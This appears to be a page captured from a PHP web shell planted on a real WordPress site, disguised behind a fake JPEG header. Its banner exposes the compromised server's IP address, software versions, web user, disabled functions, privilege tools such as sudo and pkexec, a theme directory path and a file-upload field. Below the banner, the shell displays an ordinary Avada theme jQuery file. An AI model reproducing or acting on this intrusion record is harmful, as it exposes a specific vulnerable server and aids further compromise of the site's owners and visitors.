????JFIF??x?x????'
Server IP : 79.136.114.73 / Your IP : 18.117.135.125 Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64 User : www-data ( 33) PHP Version : 5.5.9-1ubuntu4.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /var/www/www.astacus.eu/wp-content/themes/Avada/assets/js/ |
Upload File : |
jQuery( document ).ready( function() { jQuery( '.tribe-ticket-quantity' ).addClass( 'qty' ).wrap( '<div class="quantity"></div>' ); // Disable the navigation top and bottom lines, when there is no prev and next nav if ( ! jQuery.trim( jQuery( '.tribe-events-nav-previous' ).html() ).length && ! jQuery.trim( jQuery( '.tribe-events-nav-next' ).html() ).length ) { jQuery( '.tribe-events-sub-nav' ).parent( '#tribe-events-footer' ).hide(); } jQuery( '.fusion-tribe-has-featured-image' ).each( function() { var height = jQuery( this ).parent().height(); jQuery( this ).find( '.tribe-events-event-image' ).css( 'height', height ); }); jQuery( window ).on( 'resize', function() { var height; jQuery( '.fusion-tribe-has-featured-image' ).each( function() { jQuery( this ).find( '.tribe-events-event-image' ).css( 'height', 'auto' ); height = jQuery( this ).parent().height(); jQuery( this ).find( '.tribe-events-event-image' ).css( 'height', height ); }); }); }); jQuery( window ).load( function() { // Equal Heights Elements jQuery( '.fusion-events-shortcode' ).each( function() { jQuery( this ).find( '.fusion-events-meta' ).equalHeights(); }); jQuery( window ).on( 'resize', function() { jQuery( '.fusion-events-shortcode' ).each( function() { jQuery( this ).find( '.fusion-events-meta' ).equalHeights(); }); }); }); jQuery( document ).ajaxComplete( function( event, request, settings ) { var $postsContainer, $posts; jQuery( '.fusion-tribe-has-featured-image' ).each( function() { var height = jQuery( this ).parent().height(); jQuery( this ).find( '.tribe-events-event-image' ).css( 'height', height ); }); jQuery( this ).find( '.post' ).each( function() { jQuery( this ).find( '.fusion-post-slideshow' ).flexslider(); jQuery( this ).find( '.full-video, .video-shortcode, .wooslider .slide-content' ).fitVids(); }); // Fade in new posts when all images are loaded, then relayout isotope $postsContainer = jQuery( '#tribe-events .fusion-blog-layout-grid' ); $posts = $postsContainer.find( '.post' ); $postsContainer.css( 'height', $postsContainer.height() ); $posts.hide(); imagesLoaded( $posts, function() { $postsContainer.css( 'height', '' ); $posts.fadeIn(); // Relayout isotope $postsContainer.isotope(); jQuery( window ).trigger( 'resize' ); // Refresh the scrollspy script for one page layouts jQuery( '[data-spy="scroll"]' ).each( function() { var $spy = jQuery( this ).scrollspy( 'refresh' ); }); }); if ( jQuery( '.fusion-page-title-bar h1' ).length && jQuery( '.tribe-events-page-title' ).length ) { jQuery( '.fusion-page-title-bar h1' ).text( jQuery( '.tribe-events-page-title' ).text() ); } });